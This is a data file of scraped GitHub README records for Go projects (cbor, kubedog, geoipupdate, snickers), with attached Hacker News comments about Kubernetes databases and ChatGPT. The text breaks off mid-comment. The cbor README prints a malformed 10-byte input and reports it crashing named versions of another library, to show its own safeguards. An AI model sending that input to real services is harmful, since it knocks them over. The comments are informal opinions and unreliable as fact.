type.\ntags.Add(\t\n\tcbor.TagOptions{EncTag: cbor.EncTagRequired, DecTag: cbor.DecTagRequired}, \n\treflect.TypeOf(signedCWT{}), \n\t18)\n\n// Create DecMode with immutable tags.\ndm, _ := cbor.DecOptions{}.DecModeWithTags(tags)\n\n// Unmarshal to signedCWT with tag support.\nvar v signedCWT\nif err := dm.Unmarshal(data, &v); err != nil {\n\treturn err\n}\n\n// Create EncMode with immutable tags.\nem, _ := cbor.EncOptions{}.EncModeWithTags(tags)\n\n// Marshal signedCWT with tag number.\nif data, err := em.Marshal(v); err != nil {\n\treturn err\n}\n```\n\nFor more examples, see [examples_test.go](example_test.go).\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Comparisons\n\nComparisons are between this newer library and a well-known library that had 1,000+ stars before this library was created. Default build settings for each library were used for all comparisons.\n\n__This library is safer__. Small malicious CBOR messages are rejected quickly before they exhaust system resources.\n\nDecoding 9 or 10 bytes of malformed CBOR data shouldn't exhaust memory. For example, \n`[]byte{0x9B, 0x00, 0x00, 0x42, 0xFA, 0x42, 0xFA, 0x42, 0xFA, 0x42}`\n\n| | Decode bad 10 bytes to interface{} | Decode bad 10 bytes to []byte |\n| :--- | :------------------ | :--------------- |\n| fxamacker/cbor
1.0-2.3 | 49.44 ns/op, 24 B/op, 2 allocs/op* | 51.93 ns/op, 32 B/op, 2 allocs/op* |\n| ugorji/go 1.2.6 | \u26a0\ufe0f 45021 ns/op, 262852 B/op, 7 allocs/op | \ud83d\udca5 runtime: out of memory: cannot allocate |\n| ugorji/go 1.1.0-1.1.7 | \ud83d\udca5 runtime: out of memory: cannot allocate | \ud83d\udca5 runtime: out of memory: cannot allocate|\n\n*Speed and memory are for latest codec version listed in the row (compiled with Go 1.17.5).\n\nfxamacker/cbor CBOR safety settings include: MaxNestedLevels, MaxArrayElements, MaxMapPairs, and IndefLength.\n\n__This library is smaller__. Programs like senmlCat can be 4 MB smaller by switching to this library. Programs using more complex CBOR data types can be 9.2 MB smaller.\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_size_comparison.svg?sanitize=1 \"CBOR speed comparison chart\")\n\n\n__This library is faster__ for encoding and decoding CBOR Web Token (CWT). However, speed is only one factor and it can vary depending on data types and sizes. Unlike the other library, this one doesn't use Go's ```unsafe``` package or code gen.\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_speed_comparison.svg?sanitize=1 \"CBOR speed comparison chart\")\n\n__This library uses less memory__ for encoding and decoding CBOR Web Token (CWT) using test data from RFC 8392 A.1.\n\n| | fxamacker/cbor 2.3 | ugorji/go 1.2.6 |\n| :--- | :--- | :--- | \n| Encode CWT | 0.18 kB/op         2 allocs/op | 1.35 kB/op         4 allocs/op |\n| Decode CWT | 160 bytes/op     6 allocs/op | 744 bytes/op     6 allocs/op |\n\nRunning your own benchmarks is highly recommended. Use your most common data structures and data sizes.\n\n
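If it helps as a starting point, here is a minimal sketch of such a benchmark using Go's `testing` package (the `myMsg` type and package name are placeholders; substitute your own most common message):\n\n```go\npackage mypkg // hypothetical package; place this in a _test.go file\n\nimport (\n\t\"testing\"\n\n\t\"github.com/fxamacker/cbor/v2\"\n)\n\ntype myMsg struct { // placeholder: use your own data structure\n\tID uint64 `cbor:\"1,keyasint\"`\n\tName string `cbor:\"2,keyasint\"`\n}\n\nfunc BenchmarkMarshalMyMsg(b *testing.B) {\n\tv := myMsg{ID: 1, Name: \"example\"}\n\tfor i := 0; i < b.N; i++ {\n\t\tif _, err := cbor.Marshal(v); err != nil {\n\t\t\tb.Fatal(err)\n\t\t}\n\t}\n}\n\nfunc BenchmarkUnmarshalMyMsg(b *testing.B) {\n\tdata, _ := cbor.Marshal(myMsg{ID: 1, Name: \"example\"})\n\tvar v myMsg\n\tfor i := 0; i < b.N; i++ {\n\t\tif err := cbor.Unmarshal(data, &v); err != nil {\n\t\t\tb.Fatal(err)\n\t\t}\n\t}\n}\n```\n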
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Benchmarks\n\nGo structs are faster than maps with string keys:\n\n* decoding into struct is >28% faster than decoding into map.\n* encoding struct is >35% faster than encoding map.\n\nGo structs with `keyasint` struct tag are faster than maps with integer keys:\n\n* decoding into struct is >28% faster than decoding into map.\n* encoding struct is >34% faster than encoding map.\n\nGo structs with `toarray` struct tag are faster than slice:\n\n* decoding into struct is >15% faster than decoding into slice.\n* encoding struct is >12% faster than encoding slice.\n\nDoing your own benchmarks is highly recommended. Use your most common message sizes and data types.\n\nSee [Benchmarks for fxamacker/cbor](CBOR_BENCHMARKS.md).\n\n## Fuzzing and Code Coverage\n\n__Over 375 tests__ must pass on 4 architectures before tagging a release. They include all RFC 7049 and RFC 8949 examples, bugs found by fuzzing, maliciously crafted CBOR data, and over 87 tests with malformed data. There's some overlap in the tests but it isn't a high priority to trim tests.\n\n__Code coverage__ must not fall below 95% when tagging a release. Code coverage is above 98% (`go test -cover`) for cbor v2.3 which is among the highest for libraries (in Go) of this type.\n\n__Coverage-guided fuzzing__ must pass 1+ billion execs using a large corpus before tagging a release. Fuzzing is usually continued after the release is tagged and is manually stopped after reaching 1-3 billion execs. Fuzzing uses a customized version of [dvyukov/go-fuzz](https://github.com/dvyukov/go-fuzz).\n\nTo prevent delays to release schedules, fuzzing is not restarted for a release if changes are limited to ci, docs, and comments.\n\n
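For users who want to fuzz their own decode paths, here is a minimal sketch of a native Go fuzz target (an illustration only, not the project's customized dvyukov/go-fuzz setup; it requires Go 1.18+ and the package name is a placeholder):\n\n```go\npackage mypkg // hypothetical package; place this in a _test.go file\n\nimport (\n\t\"testing\"\n\n\t\"github.com/fxamacker/cbor/v2\"\n)\n\n// FuzzUnmarshal feeds arbitrary bytes to Unmarshal; it should return an error or a\n// value but never panic. Run with: go test -fuzz=FuzzUnmarshal\nfunc FuzzUnmarshal(f *testing.F) {\n\tf.Add([]byte{0xa1, 0x61, 0x61, 0x01}) // seed corpus: the CBOR map {\"a\": 1}\n\tf.Fuzz(func(t *testing.T, data []byte) {\n\t\tvar v interface{}\n\t\t_ = cbor.Unmarshal(data, &v)\n\t})\n}\n```\n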
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Versions and API Changes\nThis project uses [Semantic Versioning](https://semver.org), so the API is always backwards compatible unless the major version number changes. \n\nThese functions have signatures identical to encoding/json and they will likely never change even after major new releases: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, and `(*Decoder).Decode`.\n\nNewly added API documented as \"subject to change\" are excluded from SemVer.\n\nNewly added API in the master branch that has never been release tagged are excluded from SemVer.\n\n## Code of Conduct \nThis project has adopted the [Contributor Covenant Code of Conduct](CODE_OF_CONDUCT.md). Contact [faye.github@gmail.com](mailto:faye.github@gmail.com) with any questions or comments.\n\n## Contributing\nPlease refer to [How to Contribute](CONTRIBUTING.md).\n\n## Security Policy\nSecurity fixes are provided for the latest released version of fxamacker/cbor.\n\nFor the full text of the Security Policy, see [SECURITY.md](SECURITY.md).\n\n## Disclaimers\nPhrases like \"no crashes\", \"doesn't crash\", and \"is secure\" mean there are no known crash bugs in the latest version based on results of unit tests and coverage-guided fuzzing. They don't imply the software is 100% bug-free or 100% invulnerable to all known and unknown attacks.\n\nPlease read the license for additional disclaimers and terms.\n\n## Special Thanks\n\n__Making this library better__ \n\n* Stefan Tatschner for using this library in [sep](https://rumpelsepp.org/projects/sep), being the 1st to discover my CBOR library, requesting time.Time in issue #1, and submitting this library in a [PR to cbor.io](https://github.com/cbor/cbor.github.io/pull/56) on Aug 12, 2019.\n* Yawning Angel for using this library to [oasis-core](https://github.com/oasislabs/oasis-core), and requesting BinaryMarshaler in issue #5.\n* Jernej Kos for requesting RawMessage in issue #11 and offering feedback on v2.1 API for CBOR tags.\n* ZenGround0 for using this library in [go-filecoin](https://github.com/filecoin-project/go-filecoin), filing \"toarray\" bug in issue #129, and requesting \nCBOR BSTR <--> Go array in #133.\n* Keith Randall for [fixing Go bugs and providing workarounds](https://github.com/golang/go/issues/36400) so we don't have to wait for new versions of Go.\n\n__Help clarifying CBOR RFC 7049 or 7049bis (7049bis is the draft of RFC 8949)__\n\n* Carsten Bormann for RFC 7049 (CBOR), adding this library to cbor.io, his fast confirmation to my RFC 7049 errata, approving my pull request to 7049bis, and his patience when I misread a line in 7049bis.\n* Laurence Lundblade for his help on the IETF mailing list for 7049bis and for pointing out on a CBORbis issue that CBOR Undefined might be problematic translating to JSON.\n* Jeffrey Yasskin for his help on the IETF mailing list for 7049bis.\n\n__Words of encouragement and support__\n\n* Jakob Borg for his words of encouragement about this library at Go Forum. This is especially appreciated in the early stages when there's a lot of rough edges.\n\n\n## License \nCopyright \u00a9 2019-2022 [Faye Amacker](https://github.com/fxamacker). \n\nfxamacker/cbor is licensed under the MIT License. See [LICENSE](LICENSE) for the full license text. \n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "werf/kubedog", "link": "https://github.com/werf/kubedog", "tags": ["cicd", "helm", "rollout", "follow", "kubectl", "devops", "werf", "watcher", "kubernetes"], "stars": 528, "description": "Library to watch and follow kubernetes resources in CI/CD deploy pipelines", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n# kubedog\n\nKubedog is a library to watch and follow Kubernetes resources in CI/CD deploy pipelines.\n\nThis library is used in the [werf CI/CD tool](https://github.com/werf/werf) to track resources during deploy process.\n\n**NOTE:** Kubedog also includes a CLI, however it provides a *minimal* interface to access library functions. CLI was created to check library features and for debug purposes. Currently, we have no plans on further improvement of CLI.\n\n## Table of Contents\n- [Install kubedog CLI](#install-kubedog-cli)\n - [Linux/macOS](#linuxmacos)\n - [Windows](#windows-powershell)\n - [Alternative binary installation](#alternative-binary-installation)\n- [Usage](#usage)\n- [Community](#community)\n- [License](#license)\n\n## Install `kubedog` CLI\n\n### Linux/macOS\n\n[Install trdl](https://github.com/werf/trdl/releases/) to `~/bin/trdl`, which will manage `kubedog` installation and updates. Add `~/bin` to your $PATH.\n\nAdd `kubedog` repo to `trdl`:\n```shell\ntrdl add kubedog https://tuf.kubedog.werf.io 1 2cc56abdc649a9699074097ba60206f1299e43b320d6170c40eab552dcb940d9e813a8abf5893ff391d71f0a84b39111ffa6403a3e038b81634a40d29674a531\n```\n\nTo use `kubedog` on a workstation we recommend setting up `kubedog` _automatic activation_. For this the activation command should be executed for each new shell session. Often this is achieved by adding the activation command to `~/.bashrc` (for Bash), `~/.zshrc` (for Zsh) or to the one of the profile files, but this depends on the OS/shell/terminal. Refer to your shell/terminal manuals for more information.\n\nThis is the `kubedog` activation command for the current shell-session:\n```shell\nsource \"$(trdl use kubedog 0 stable)\"\n```\n\nTo use `kubedog` in CI prefer activating `kubedog` manually instead. For this execute the activation command in the beginning of your CI job, before calling the `kubedog` binary.\n\n### Windows (PowerShell)\n\nFollowing instructions should be executed in PowerShell.\n\n[Install trdl](https://github.com/werf/trdl/releases/) to `:\\Users\\\\bin\\trdl`, which will manage `kubedog` installation and updates. Add `:\\Users\\\\bin\\` to your $PATH environment variable.\n\nAdd `kubedog` repo to `trdl`:\n```powershell\ntrdl add kubedog https://tuf.kubedog.werf.io 1 2cc56abdc649a9699074097ba60206f1299e43b320d6170c40eab552dcb940d9e813a8abf5893ff391d71f0a84b39111ffa6403a3e038b81634a40d29674a531\n```\n\nTo use `kubedog` on a workstation we recommend setting up `kubedog` _automatic activation_. For this the activation command should be executed for each new PowerShell session. For PowerShell this is usually achieved by adding the activation command to [$PROFILE file](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles).\n\nThis is the `kubedog` activation command for the current PowerShell-session:\n```powershell\n. $(trdl use kubedog 0 stable)\n```\n\nTo use `kubedog` in CI prefer activating `kubedog` manually instead. For this execute the activation command in the beginning of your CI job, before calling the `kubedog` binary.\n\n### Alternative binary installation\n\nThe recommended way to install `kubedog` is described above. 
Alternatively, although not recommended, you can download `kubedog` binary straight from the [GitHub Releases page](https://github.com/werf/kubedog/releases/), optionally verifying the binary with the PGP signature.\n\n## Usage\n\n* [CLI usage](doc/usage.md#cli-usage)\n* [Library usage: Multitracker](doc/usage.md#Multitracker)\n\n## Community\n\nPlease feel free to reach us via [project's Discussions](https://github.com/werf/kubedog/discussions) and [werf's Telegram group](https://t.me/werf_io) (there's [another one in Russian](https://t.me/werf_ru) as well).\n\nYou're also welcome to follow [@werf_io](https://twitter.com/werf_io) to stay informed about all important news, articles, etc.\n\n## License\n\nKubedog is an Open Source project licensed under the [Apache License](https://www.apache.org/licenses/LICENSE-2.0).\n", "readme_type": "markdown", "hn_comments": "Do not try to run database using bare kubernetes objects.\nTry to see if some of the operators fit your need.Your main issue will be IO unless you use a host only PV and if you do that you are likely limiting you db instamce to a specific node which can have scaling and/or HA impacts. Most will go with a network based FS to back your db data, if that is the case your network IO will likely impact your db performance. For a dev or test env this might not be a problem but for prod it is usually a blocker.Can you or someone else elaborate on what issues you run into when running a database within Kubernetes? To be transparent, I have always ran my databases on dedicated or on AWS instances. I am interested in understanding what specific issues you have seen running DB instances within Kubernetes.I work at Zalando where we run hundreds of PostgreSQL database clusters on Kubernetes (on AWS) using our Postgres Operator (https://github.com/zalando/postgres-operator). This gives us some added flexibility, quick startup (e.g. for e2e), and the latest PG features. That being said, I would be careful to recommend any specific stateful workload approach without good understanding of the whole setup (true for whatever cloud/k8s/onprem environment).", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "maxmind/geoipupdate", "link": "https://github.com/maxmind/geoipupdate", "tags": [], "stars": 528, "description": "GeoIP update client code", "lang": "Go", "repo_lang": "", "readme": "# GeoIP Update\n\nThe GeoIP Update program performs automatic updates of GeoIP2 and\nGeoLite2 binary databases. CSV databases are _not_ supported.\n\n## Installation\n\nWe provide releases for Linux, macOS (darwin), and Windows. Please see the\n[Releases](https://github.com/maxmind/geoipupdate/releases) tab for the\nlatest release.\n\nAfter you install GeoIP Update, please refer to our\n[documentation](https://dev.maxmind.com/geoip/updating-databases?lang=en) for information\nabout configuration.\n\nIf you're upgrading from GeoIP Update 3.x, please see our [upgrade\nguide](https://dev.maxmind.com/geoip/upgrading-geoip-update?lang=en).\n\n### Installing on Linux via the tarball\n\nDownload and extract the appropriate tarball for your system. You will end\nup with a directory named something like `geoipupdate_4.0.0_linux_amd64`\ndepending on the version and architecture.\n\nCopy `geoipupdate` to where you want it to live. 
To install it to\n`/usr/local/bin/geoipupdate`, run the equivalent of `sudo cp\ngeoipupdate_4.0.0_linux_amd64/geoipupdate /usr/local/bin`.\n\n`geoipupdate` looks for the config file `/usr/local/etc/GeoIP.conf` by\ndefault.\n\n### Installing on Ubuntu via PPA\n\nMaxMind provides a PPA for recent versions of Ubuntu. To add the PPA to\nyour sources, run:\n\n```\n$ sudo add-apt-repository ppa:maxmind/ppa\n```\n\nThen install `geoipupdate` by running:\n\n```\n$ sudo apt update\n$ sudo apt install geoipupdate\n```\n\n### Installing on Ubuntu or Debian via the deb\n\nYou can also use the tarball.\n\nDownload the appropriate .deb for your system.\n\nRun `dpkg -i path/to/geoipupdate_4.0.0_linux_amd64.deb` (replacing the\nversion number and architecture as necessary). You will need to be root.\nFor Ubuntu you can prefix the command with `sudo`. This will install\n`geoipupdate` to `/usr/bin/geoipupdate`.\n\n`geoipupdate` looks for the config file `/etc/GeoIP.conf` by default.\n\n### Installing on RedHat or CentOS via the rpm\n\nYou can also use the tarball.\n\nDownload the appropriate .rpm for your system.\n\nRun `rpm -Uvhi path/to/geoipupdate_4.0.0_linux_amd64.rpm` (replacing the\nversion number and architecture as necessary). You will need to be root.\nThis will install `geoipupdate` to `/usr/bin/geoipupdate`.\n\n`geoipupdate` looks for the config file `/etc/GeoIP.conf` by default.\n\n### Installing on macOS (darwin) via the tarball\n\nThis is the same as installing on Linux via the tarball, except choose a\ntarball with \"darwin\" in the name.\n\n### Installing on macOS via Homebrew\n\nIf you are on macOS and you have [Homebrew](http://brew.sh/) you can install\n`geoipupdate` via `brew`\n\n```\n$ brew install geoipupdate\n```\n\n### Installing on Windows\n\nDownload and extract the appropriate zip for your system. You will end up\nwith a directory named something like `geoipupdate_4.0.0_windows_amd64`\ndepending on the version and architecture.\n\nCopy `geoipupdate.exe` to where you want it to live.\n\n`geoipupdate` looks for the config file\n`\\ProgramData\\MaxMind/GeoIPUpdate\\GeoIP.conf` on your system drive by\ndefault.\n\n### Installing via Docker\n\nPlease see our [Docker documentation](doc/docker.md).\n\n### Installation from source or Git\n\nYou need the Go compiler (1.13+). You can get it at the [Go\nwebsite](https://golang.org).\n\nThe easiest way is via `go get`:\n\n $ env GO111MODULE=on go get -u github.com/maxmind/geoipupdate/v4/cmd/geoipupdate\n\nThis installs `geoipupdate` to `$GOPATH/bin/geoipupdate`.\n\n# Configuring\n\nPlease see our [online guide](https://dev.maxmind.com/geoip/updating-databases?lang=en) for\ndirections on how to configure GeoIP Update.\n\n# Documentation\n\nSee our documentation for the [`geoipupdate` program](doc/geoipupdate.md)\nand the [`GeoIP.conf` configuration file](doc/GeoIP.conf.md).\n\n# Default config file and database directory paths\n\nWe define default paths for the config file and database directory. 
If\nthese defaults are not appropriate for you, you can change them at build\ntime using flags:\n\n go build -ldflags \"-X main.defaultConfigFile=/etc/GeoIP.conf \\\n -X main.defaultDatabaseDirectory=/usr/share/GeoIP\"\n\n# Bug Reports\n\nPlease report bugs by filing an issue with [our GitHub issue\ntracker](https://github.com/maxmind/geoipupdate/issues).\n\n# Copyright and License\n\nThis software is Copyright (c) 2018 - 2022 by MaxMind, Inc.\n\nThis is free software, licensed under the [Apache License, Version\n2.0](LICENSE-APACHE) or the [MIT License](LICENSE-MIT), at your option.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "snickers/snickers", "link": "https://github.com/snickers/snickers", "tags": ["encoding", "ffmpeg", "video", "rest", "api", "multimedia"], "stars": 528, "description": ":chocolate_bar: An open source alternative to the video cloud encoding services.", "lang": "Go", "repo_lang": "", "readme": "

\n\n[![Build Status](https://travis-ci.org/snickers/snickers.svg?branch=master)](https://travis-ci.org/snickers/snickers)\n[![codecov](https://codecov.io/gh/snickers/snickers/branch/master/graph/badge.svg)](https://codecov.io/gh/snickers/snickers)\n[![Go Report Card](https://goreportcard.com/badge/github.com/snickers/snickers)](https://goreportcard.com/report/github.com/snickers/snickers)\n
\nSnickers is an open source alternative to the existent cloud encoding services. It is a HTTP API that encode videos.\n\n## Setting Up\n\nFirst make sure you have [Go](https://golang.org/dl/) and [FFmpeg](http://ffmpeg.org/) with `--enable-shared` installed on your machine. If you don't know what this means, look at how the dependencies are being installed on our [Dockerfile](https://github.com/snickers/snickers-docker/blob/master/Dockerfile).\n\nDownload the dependencies:\n\n```\n$ make build\n```\n\nYou can store presets and jobs on memory or [MongoDB](https://www.mongodb.com/). On your `config.json` file:\n\n- For MongoDB, set `DATABASE_DRIVER: \"mongo\"` and `MONGODB_HOST: \"your.mongo.host\"`\n- For memory, just set `DATABASE_DRIVER: \"memory\"` and you're good to go.\n\nPlease be aware that in case you use `memory`, Snickers will persist the data only while the application is running.\n\nRun!\n\n```\n$ make run\n```\n\n## Running tests\n\nMake sure you have [mediainfo](https://sourceforge.net/projects/mediainfo/) installed and a local instance of [MongoDB](https://github.com/mongodb/mongo) running.\n\n```\n$ make test\n```\n\n## Using the API\n\nCheck out the [Wiki](https://github.com/snickers/snickers/wiki/How-to-Use-the-API) to learn how to use the API.\n\n## Contributing\n\n1. Fork it\n2. Create your feature branch: `git checkout -b my-awesome-new-feature`\n3. Commit your changes: `git commit -m 'Add some awesome feature'`\n4. Push to the branch: `git push origin my-awesome-new-feature`\n5. Submit a pull request\n\n## License\n\nThis code is under [Apache 2.0 License](https://github.com/snickers/snickers/blob/master/LICENSE).\n\n", "readme_type": "markdown", "hn_comments": "I\u2019m envisioning a bifurcation of reality where some people live in an entirely fact based world (or as close an approximation to fact based as a human can objectively reach, aka the observable, knowable universe) and some live in a complete fabrication, a fantasy version carefully crafted by AIs. Now add Augmented Reality to the mix, and it\u2019s a dystopian nightmare.And I don\u2019t think the US political left will be immune to it as much as they may think. While I agree that older Americans on the right are highly susceptible to misinformation, and media literacy is dismal among that demographic, younger people are also prone to it. Just look at all the unhinged utter nonsense that is wildly popular on TikTok.The ability of ML models to authoritatively spout bullshit will make gish gallops worse than they are now. It will also make echo chambers even worse, as digital alternate realities will further divide people. I mean, who wants to engage with those who completely rejects that the sky is objectively blue, or that 2 + 2 = 4? Well now they\u2019ll have articulate, authoritative responses with works cited explaining why the sky is red, actually.Who needs Big Brother when people choose the method of their own subjugation eagerly and with dessert?ChatGPT is like that tipping point where things starts to get wild. It really seem like a tipping point. Put another way, it opens up a new graph and it set at zeroNo matter how cool something is, there will always be people saying it isn't that impressive. Perpetual motion could be invented and there would still be people going \"yeah sure, but it's not a free energy machine so it's a scam\"Maybe I missed the memo but why isn't anyone impressed that a computer can generate well formed prose in response to arbitrary questions? 
It seems like we've completely leaped over that as an achievement and are now arguing over how it's confidently wrong or how there are emergent patterns in what it has to say. No one is claiming it's a general intelligence but it's still amazingly impressive.Heh, this makes it sound like consultants will be the hardest hit by the LLM-driven automation wave.What a pointless article.It seems somehow that Asimov got it right. The obvious next steps are all about making it smarter but also implement the right ethic rules...Ah yes let's anthropomorphize a bunch of numbers, then name him a con artist. This is going to be a thoughtful articleI wonder if the biggest shortcoming of GPT right now is not that it sometimes gets things wrong, or can't cite its sources, or whatever - maybe it needs to learn when to say \"I don't know the answer to that question\".That's a pretty hard thing for most humans (and myself) to learn to say, and I suspect GPT's training data (tha internet) doesn't include a lot of \"I'm not sure\" language and probably does include a lot of \"I'm definitely sure and definitely totally correct\" language (maybe, I guess, no evidence to back up that suggestion, I'm not sure).Many of my favorite coworkers, friends, doctors, pundits are trustworthy exactly because they work hard to not profess knowledge they are unsure about. The reason (IMO) that Scott Alexander is a jewel of the internet is because of the way he quantifies uncertainty when working through a topic.I don't think GPT is a con, it's doing exactly what it was trined to do. I think the problem is people put false confidence into it. Because it appears to give correct information, ChatGPT has been put on this pedestal by the non-tech world as being some revolution. In fact it's not a revolution, they just figured out how to build a chatbot that returns convincing statements that sounds human, correct information is not it's' strong suit, sounding smooth in a conversation is.Dismissive to tech that isn\u2019t mostly gimmick is dangerous. Dismissive to crypto isn\u2019t dangerous. They other thread, someone said AI is the beginning of web3.0, that made 50x more sense than saying crypto ismy challenge to whomever that proclaims chatgpt showed/explained/answered xyz is: can you get the same (or similar) text online by searching parts of the bot's response?much of the response in such scenarios is heavily influenced by the training data and not the llm creating phrases from thin air.Does anyone else have issue with having to provide a phone number to access it?I signed up, verified email, and then was told I needed to verify with phone. This means, to me, (lest I read their TOS) that they are associating any queries I make with my identity.I can't wait for this tech to go open source and local on devices.ChatGPT is good for some things, it's not very good for others. If you're writing a paper on a controversial topic, you're going to get a one sided and biased answer; and it will be written like a HS freshman. If you're asking something straight forward, you'll have a better experience. Some people have said they've gotten it to diagnose something, but I've tried and failed at getting it to do such a thing. I do think there is a massive over reaction to its usefulness, but it is a powerful tool to have, nevertheless.See also: https://en.wikipedia.org/wiki/Hallucination_(artificial_inte...Who are these people who see something amazing like this and actually just can\u2019t process it? 
Their brains can\u2019t handle it.> You don\u2019t worry whether it\u2019s true or not\u2014because ethical scruples aren\u2019t part of your job description.I wonder if this might hit the core of the matter.I think it's noteworthy that we use it both for tasks where it should generate fiction (\"Tell me a story about a dog in space\") and tasks where it should retrieve a factual answer (\"What was the name of the first dog in space?\").I wonder if ChatGPT actually distinguishes between those two kinds of tasks at all.I can't tell what is worse now: the sycophantic ChatGPT hype guys/gals who write articles \"it's coming for all of our jerbs!\", or articles like this one that deliberately misuse ChatGPT and then say \"it's overhyped\".They're both missing the point.Yes, ChatGPT can be tricked, confidently give wrong answers, but it is still ludicrously useful.It is basically like having an incredibly smart engineer/scientists/philosopher/etc that can explain things quite well, but for pretty much every field. Does this \"person\" make mistakes? Can't cite their sources? Yeah this definitely happens (especially the sources thing), but when you're trying to understand something new and complex and you can't get the \"gist\" of it, ChatGPT does surprisingly well.I've had it debug broken configs on my server and router (and explain to me why they were broken), help me practice a foreign language I've slowly been forgetting (hint: \"I would like to practice $language, so let's have a conversation in $language where you only use very simple words.\" -> ChatGPT will obey), and help me understand how to use obscure software libraries that don't have much documentation online (e.g. Boost Yap, useful but with a dearth of blog / reddit posts about it).Does it sometimes goof up? Yep, but it is such an incredibly useful tool nonetheless for the messy process of learning something new.It\u2019s a very good demonstration of how powerful artifical intelligence will be. When we truly get that it will be the new dominant species.But it\u2019s just not intelligent. There\u2019s no thoughts there. They\u2019ve just brute forced a really big markov chain. You need a completely different approach to get true intelligence.I'm finding the analytic-synthetic distinction to be somewhat useful, even if it veers in important ways from how these terms were defined and used by Kant/Frege/Quine, etc.Roughly, if the prompt is \"analytic\", that is contains all the necessary facts for the expected output, then the tool is much more reliable.If the prompt is \"synthetic\", that is it contingent on outside facts, then the tool is much less reliable.All this buzz around ChatGPT is really people finally realizing that transformers exist.I used daily to ask technical questions and it answers better than most of my colleagues and myself included.I wouldn't call that a con. But that blogpost maybe ^^That last tweet is crazy:Tell me a lie: The earth is flat\nTell me a less obvious lie: I am not capable of feeling emotions.There's wonderful ambiguity there. Is ChatGPT refusing to tell a less obvious lie because \"reasons,\" or is it admitting it can feel emotions?This is very fun.So what are search engines, with SEO'd results and all?If it was \"the slickest con artist of all time\", that would be an achivement of Artificial General Intelligence that the AI community can only dream of.\"Cars won't replace horses, because they require roads and horses don't.\"It seems particularly bad about music theory. 
The article lists the example of listing Bb as the tritone of F (it's actually B). And I just got it to give me complete and utter garbage, whilst sounding confident:https://i.imgur.com/S07uT58.pngChatGPT was hailed and advertised as conversational, by its creators.Other people quickly realized it could have a conversation about anything and try to use it as an oracle of knowledge. ChatGPT is not hailed as an oracle of knowledge by its creators.Hence, there is no con artistry occurring except people that play themselves.I would greatly appreciate a moratorium on this genre of article until there is compelling accompanying evidence that a meaningful portion of ChatGPT's users are unaware of these shortcomings. I have yet to encounter or even hear of a non-technical person playing around with ChatGPT without stumbling into the type of confidently-stated absurdities and half-truths displayed in this article, and embracing that as a limitation of the tool.It seems to me that the overwhelming majority of people working with ChatGPT are aware of the \"con\" described in this article -- even if they view it as a black box, like Google, and lack a top-level understanding of how an LLM works. Far greater misperceptions around ChatGPT prevail than the idea that it is an infallible source of knowledge.I'm in my 30s, so I remember the very early days of Wikipedia and the crisis of epistemology it seemed to present. Can you really trust an encyclopedia anyone can edit? Well, yes and no -- it's a bit like a traditional encyclopedia in that way. The key point to observe is that two decades on, we're still using it, a lot, and the trite observation that it \"could be wrong\" has had next to no bearing on its social utility. Nor have repeated observations to that effect tended to generate much intellectually stimulating conversation.So yeah, ChatGPT gets stuff wrong. That's the least interesting part of the story.I don't think Ted Gioia understands what he's talking about.It's like he walked into a McDonalds bathroom and after a few minutes asks, \"Where the hell are the burgers?\"This my personal opinion and may be entirely worthless. The quality of answers I read in all of the examples posted in that article read like the questions were routed to an offshore boiler room where the answers were crafted by humans. Like some modern day Mechanical Turk. Especially in the 6 eggs example, there is a complete discontinuity of thought across the answers, isn't this within a single session with the AI? To me it looks like different brains answered each question/challenge and seemed to have a bias toward not offending the human asking the questions.Also, in this example, the first answer of 2 is correct: broke 2 (6-2 = 4), fried 2 (4-2 = 2) then ate 2, which most commonly implies it was the fried eggs that were eaten (2-0 = 2)One thing that\u2019s standing out is most of the commentary around this is relative to the depth and degree to which someone has played around with this technology.For example, you can get really clean results if you obsess over getting the prompts dialled in, and breaking them up in the right order as much as needed. This wasn\u2019t something I initially focussed in on. I just enjoyed Playing with it as a surface level.Using this rate from the first day or two, it was much more wide-open and my feeling was I think this already does way more than it\u2019s being advertised. 
I didn\u2019t necessarily like that it was a chat interface, but but was quickly reminded that chat really is the universal interface, and that can create a lot of beginners. Solutions aside, the interface is inviting and welcoming enough. And once you can get into the meat of a conversation you can get more depth. For me, that\u2019s one of the accomplishments here.Solely relying on this for completely true results is probably the con. It is a great way to learn about the concepts that might be present in an area that is new to you, but he doesn\u2019t comment on every individual to go look into those themselves.The second we do for that ability entirely to a machine, and its interpretation of interpretations, that\u2019s a much bigger failure to ourselves.There\u2019s no doubt this will get dialled in. And 20 bucks a month to apply general helpfulness to pretty much anything, in anyone\u2019s world, could be a pretty big achievement.The commentary around accuracy of results from GPT in similar to the search engine wars as well as search engine relevancy domination when google arrows. I think in any event many people can agree that this one thing is very different than most of the other things that comes out. Could it be approaching an Apex? Could we be coming out of the Apex?I sincerely feel 2023 will be one of the most interesting years in tact that I can remember. And that\u2019s not even talking about the next two or three years. It is refreshing to see a months worth of progress happening in a week with such a broad audience participating in it.Two things are correct at the same time:* ChatGPT can make mistakes very confidently* 